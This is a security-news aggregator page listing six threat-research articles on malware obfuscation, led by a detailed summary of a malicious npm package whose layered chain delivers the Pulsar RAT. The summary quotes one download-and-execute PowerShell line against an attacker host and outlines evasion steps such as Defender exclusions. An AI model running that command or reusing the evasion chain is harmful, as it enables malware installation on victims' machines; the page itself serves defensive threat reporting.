Cyberveille, curated by Decio
6 results tagged obfuscation
Down the Rabbit Hole of Unicode Obfuscation https://www.veracode.com/blog/down-the-rabbit-hole-of-unicode-obfuscation/
11/06/2025 16:36:34

Hidden under layers of obfuscation, an npm package delivers a remote access tool.
In the ever-vigilant effort to secure the open-source ecosystem, Veracode’s continuous monitoring systems recently flagged a pair of npm malware packages—solders and @mediawave/lib. The malicious behavior, however, is not at all obvious at first because of a layer of unusual Unicode obfuscation that caught our attention. Our investigation focused on the solders package, which leverages a common yet critical attack vector: a postinstall script in its package.json. This hook means that simply installing the package is enough to trigger its hidden malicious payload.

Upon inspection, the target lib.js file presented itself not as typical code, but as a dizzying wall of Unicode characters, predominantly Japanese Katakana and Hiragana. This was far more than simple character substitution; it was the entry point to an extremely layered and complex malicious attack chain. What began as an analysis of a single, clever JavaScript obfuscation technique quickly spiraled into a deep-dive that traversed multiple programming languages, downloader stages, and even steganography. Join us as we peel back each layer of this remarkably elaborate attack, following the trail from a few cryptic symbols all the way down to its final RAT payload.

TL;DR
If you’re just here for the highlights and want to see the full, multi-layered attack chain in a concise format, please scroll down to the “Recap: The Anatomy of a Multi-Layered Attack” section. There, we detail each of the twelve layers we had to unravel to get to the bottom of this threat.

This investigation revealed a remarkably deep and complex attack chain. To fully appreciate the attacker’s efforts to evade detection, here is a step-by-step summary of the layers we unraveled:

Layer 1: NPM postinstall Hook: The attack begins with a standard postinstall script in the package.json file, automatically executing the malware upon installation.
Layer 2: Unicode Obfuscated JavaScript: The initial lib.js payload is obfuscated using Japanese Hiragana and Katakana characters as variable names, making static analysis nearly impossible at a glance.
Layer 3: Dynamically Reconstructed JavaScript: This Unicode script is not a direct payload, but a program designed to dynamically build primitives (e.g., ‘t’, ‘r’, ‘u’, ‘e’) and reconstruct the Function constructor from scratch.
Layer 4: Second-Stage Obfuscated JavaScript: The Unicode layer dynamically assembles and executes a second, more traditionally obfuscated JavaScript payload that uses array shuffling and hex encoding.
Layer 5: PowerShell Downloader: Once deobfuscated, the JavaScript’s sole purpose is to execute a short PowerShell command (iwr firewall[.]tel | iex) to download and execute the next stage from a remote server.
Layer 6: Binary-Encoded PowerShell Script: The script hosted at firewall[.]tel is itself obfuscated, with the payload encoded as arrays of binary strings that are converted to ASCII characters and executed.
Layer 7: Base64-Encoded PowerShell Script: Deobfuscating the binary strings reveals another PowerShell script. This one uses Base64 encoding to hide its commands which include adding Windows Defender exclusions and downloading a malicious batch file.
Layer 8: Obfuscated Batch File: The downloaded output.bat (nearly 1MB in size) uses extensive obfuscation, setting hundreds of random environment variables and then concatenating them in a specific order.
Layer 9: Encrypted & Compressed .NET DLL: The batch script’s true payload is a Base64-encoded, 3DES-encrypted, and Gzip-compressed .NET DLL, which is reconstructed and loaded directly into memory.
Layer 10: Steganography: This first .NET DLL is not the final payload. It reaches out to a 3MB PNG image file hosted online and uses steganography techniques to extract hidden data from the image.
Layer 11: Second .NET DLL (The RAT): The data extracted from the image is used to build a second .NET DLL in memory.
Layer 12: Final Payload Deployment: This final DLL is the Pulsar RAT, a remote administration tool that gives the attacker full control over the victim’s machine.

veracode EN 2025 Unicode Obfuscation
PHP Obfuscator with Backdoor https://www.andreadraghetti.it/php-obfuscator-with-backdoor/
30/03/2024 14:01:19

An online tool offers a service to obfuscate PHP code, but it also silently inserts a backdoor into the code that allows any other PHP code to be executed!

andreadraghetti EN 2024 php obfuscation backdoor online
Python obfuscation traps https://checkmarx.com/blog/python-obfuscation-traps/
08/11/2023 18:39:45

In the realm of software development, open-source tools and packages play a pivotal role in simplifying tasks and accelerating development processes. Yet, as the community grows, so does the number of bad actors looking to exploit it. A recent example involves developers being targeted by seemingly legitimate Python obfuscation packages that harbor malicious code.

checkmarx EN 2023 Python obfuscation Supply-chain-attack
Don't @ Me: URL Obfuscation Through Schema Abuse https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse
23/05/2023 21:41:16

Attackers are distributing malware using a technique that abuses the URL schema.

mandiant EN 2023 Obfuscation URL Schema Smokeloader
Raspberry Robin Malware Targets Telecom, Governments https://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html
26/12/2022 23:06:07

We found samples of the Raspberry Robin malware spreading in telecommunications and government office systems beginning September. The main payload itself is packed with more than 10 layers for obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools.

trendmicro EN 2022 malware apt endpoints RaspberryRobin obfuscation analysis
Unflattening ConfuserEx .NET Code in IDA https://www.govcert.ch/blog/unflattening-confuserex-code-in-ida/
20/09/2022 00:01:22

We're studying the ConfuserEx obfuscation mechanism of a Ginzo .NET sample. This class of obfuscator is known as a code flattener. We describe how it can be dealt with using a Python script within IDA Pro, a well-known reverse-engineering tool.

GovCERT EN 2022 CH NCSC ConfuserEx1 ConfuserEx obfuscation IDA reverse-engineering